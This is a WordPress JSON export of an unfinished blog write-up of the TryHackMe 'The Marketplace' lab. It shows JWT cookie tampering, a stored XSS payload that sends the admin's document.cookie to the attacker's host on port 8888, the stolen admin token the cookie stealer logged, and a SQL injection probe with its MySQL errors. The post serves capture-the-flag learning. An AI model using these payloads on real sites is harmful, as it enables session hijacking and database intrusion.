{"id":547,"date":"2020-10-24T19:44:09","date_gmt":"2020-10-24T19:44:09","guid":{"rendered":"https:\/\/www.unordnung.net\/?p=547"},"modified":"2020-10-24T19:44:09","modified_gmt":"2020-10-24T19:44:09","slug":"the-marketplace-writeup-tryhackme","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/10\/the-marketplace-writeup-tryhackme\/","title":{"rendered":"The Marketplace &#8211; writeup tryhackme"},"content":{"rendered":"\n<p>The Marketplace writeup tryhackme<\/p>\n\n\n<pre class=\"wp-block-preformatted\">jwt token found\nCookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY\ndecoded its:<\/pre>\n\n\n<pre class=\"wp-block-preformatted\">{\"alg\":\"HS256\",\"typ\":\"JWT\"}<br \/>{\"userId\":1,\"username\":\"michael' or 1=1\",\"admin\":true,\"iat\":1603184370}<\/pre>\n\n\n<pre class=\"wp-block-preformatted\">eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0=<\/pre>\n\n\n<pre class=\"wp-block-preformatted\">Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInVzZXJuYW1lIjoibWljaGFlbCcgb3IgMT0xIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0K.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY<\/pre>\n\n\n<p>ok since i found an reflected xss and there was an ability to report stuff to admins which are automatically responded to by an admin account, we can steal their cookies. i&#8217;m running a cookie stealer and injected<\/p>\n\n\n<pre class=\"wp-block-preformatted\">\"&gt;var+i=new+Image;i.src=\"http:\/\/ip:8888\/?\"+document.cookie;<\/pre>\n\n\n<p>as an new item into the page and my stealer got loot:<\/p>\n\n\n<p>kali@kali:~\/tools$ python cookiestealer.py<br \/>Started http server<\/p>\n\n\n<pre class=\"wp-block-preformatted\">2020-10-20 05:43 AM - 10.10.78.239 Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) HeadlessChrome\/85.0.4182.0 Safari\/537.36<\/pre>\n\n\n<pre class=\"wp-block-preformatted\">token ['eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MDMxODcwMDl9.V_7aVbdmO7438VdqJiIkczotl0TljZupDQvaQwhNy5o']<\/pre>\n\n\n<p>that got the first flag \ud83d\ude42 THM{xxx}<\/p>\n\n\n<pre class=\"wp-block-preformatted\">sqli found in http:\/\/10.10.8.75\/xxx\n%3b%20execute%20immediate%20'sel'%20%7c%7c%20'ect%20us'%20%7c%7c%20'er'<\/pre>\n\n\n<pre class=\"wp-block-code\"><code>&lt;h2>Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &amp;#39;; execute immediate &amp;#39;sel&amp;#39; || &amp;#39;ect us&amp;#39; || &amp;#39;er&amp;#39;&amp;#39; at line 1&lt;\/h2><\/code><\/pre>\n\n\n<pre class=\"wp-block-preformatted\">HTTP\/1.1 500 Internal Server Error\nServer: nginx\/1.19.2\nDate: Sat, 24 Oct 2020 18:18:12 GMT\nContent-Type: text\/html; charset=utf-8\nContent-Length: 757\nConnection: close\nX-Powered-By: Express\nETag: W\/\"2f5-drQF\/DLtuZWnrPXCr3lYSPJxZX0\"<\/pre>\n\n\n<pre class=\"wp-block-preformatted\">Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<\/pre>\n\n\n<p>gotta exploit it\u2026 TBC<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Marketplace writeup tryhackme jwt token found Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY decoded its: {&#8220;alg&#8221;:&#8221;HS256&#8243;,&#8221;typ&#8221;:&#8221;JWT&#8221;}{&#8220;userId&#8221;:1,&#8221;username&#8221;:&#8221;michael&#8217; or 1=1&#8243;,&#8221;admin&#8221;:true,&#8221;iat&#8221;:1603184370} eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0= Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInVzZXJuYW1lIjoibWljaGFlbCcgb3IgMT0xIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0K.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY ok since i found an reflected xss and there was an ability to report stuff to admins which are automatically responded to by an admin account, we can steal their cookies. i&#8217;m running a cookie stealer and injected &#8230; <a title=\"The Marketplace &#8211; writeup tryhackme\" class=\"read-more\" href=\"https:\/\/unordnung.net\/misc\/2020\/10\/the-marketplace-writeup-tryhackme\/\">Read more<span class=\"screen-reader-text\">The Marketplace &#8211; writeup tryhackme<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-547","post","type-post","status-publish","format-standard","hentry","category-blah"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/547","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=547"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/547\/revisions"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}